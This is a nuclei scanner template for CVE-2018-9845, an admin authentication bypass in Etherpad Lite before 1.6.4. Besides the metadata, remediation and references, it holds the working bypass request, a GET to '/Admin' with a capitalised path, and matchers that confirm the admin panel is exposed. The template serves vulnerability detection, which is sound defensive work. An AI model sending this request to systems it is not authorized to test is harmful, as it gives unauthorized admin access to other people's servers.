nuclei-templates/http/cves/2018/CVE-2018-9845.yaml

53 lines
1.7 KiB
YAML

id: CVE-2018-9845
info:
name: Etherpad Lite <1.6.4 - Admin Authentication Bypass
author: philippedelteil
severity: critical
description: Etherpad Lite before 1.6.4 is exploitable for admin access.
impact: |
An attacker can bypass the admin authentication and gain unauthorized access to the admin panel.
remediation: |
Upgrade to Etherpad Lite version 1.6.4 or later to fix the vulnerability.
reference:
- https://infosecwriteups.com/account-takeovers-believe-the-unbelievable-bb98a0c251a4
- https://github.com/ether/etherpad-lite/commit/ffe24c3dd93efc73e0cbf924db9a0cc40be9511b
- https://nvd.nist.gov/vuln/detail/CVE-2018-9845
- https://github.com/ether/etherpad-lite/blob/develop/CHANGELOG.md
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-9845
cwe-id: CWE-178
epss-score: 0.01393
epss-percentile: 0.86371
cpe: cpe:2.3:a:etherpad:etherpad_lite:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: etherpad
product: etherpad_lite
tags: cve2018,cve,etherpad,auth-bypass
http:
- method: GET
path:
- "{{BaseURL}}/Admin"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Etherpad version"
- "Plugin manager"
- "Installed parts"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100f7d4856acbd304333d1e35ac28fce5f6f2b891af496158d8d7ac1b843f91fb60022100ef3ccee0f552285a942fe29cd4edb16dfa5d5d19df311e25325db1354f78f83e:922c64590222798bb761d5b6d8e72950